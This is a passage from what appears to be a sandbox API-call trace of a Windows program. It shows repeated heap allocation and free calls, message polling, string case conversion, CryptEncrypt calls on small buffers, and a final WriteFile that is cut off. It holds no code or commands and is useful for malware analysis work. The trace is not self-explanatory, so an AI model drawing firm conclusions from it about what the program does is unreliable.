wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74238 | out: hHeap=0x2af0000) returned 1 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0202.856] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0202.856] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0202.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.856] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0202.856] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0202.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0202.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0202.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0202.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0202.857] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0202.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0202.857] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa38 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0202.857] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0202.857] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0202.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0202.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0202.858] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0202.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0202.858] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0202.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0202.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0202.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0202.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0202.858] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0202.858] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0202.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0202.859] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0202.859] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad20 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad80 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaade0 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad38 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac30 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac90 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac18 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0202.860] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0202.860] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaac78 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadb0 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad50 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab88 | out: hHeap=0x2af0000) returned 1 [0202.861] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0202.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaba0 | out: hHeap=0x2af0000) returned 1 [0202.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0202.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0202.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0202.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0202.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaae10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0202.862] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0202.862] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0202.862] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0202.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.862] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0202.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.862] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.862] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0202.862] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.863] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0202.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.863] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0202.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0202.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0202.863] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaad68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0202.863] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a726a8*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a726a8*, pdwDataLen=0x8cef60*=0x8) returned 1 [0202.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.863] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.863] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0202.863] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.863] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0202.864] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.864] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.864] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0202.864] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.864] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0202.864] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.864] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.864] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.864] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.864] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0202.864] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0202.864] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0202.864] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0202.864] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0202.864] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.864] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.864] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.864] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.864] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.864] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.864] WriteFile (in: hFile=0x524, lpBuffer=0x2a72708*, nNumberOfBytesToWrite=0x8, 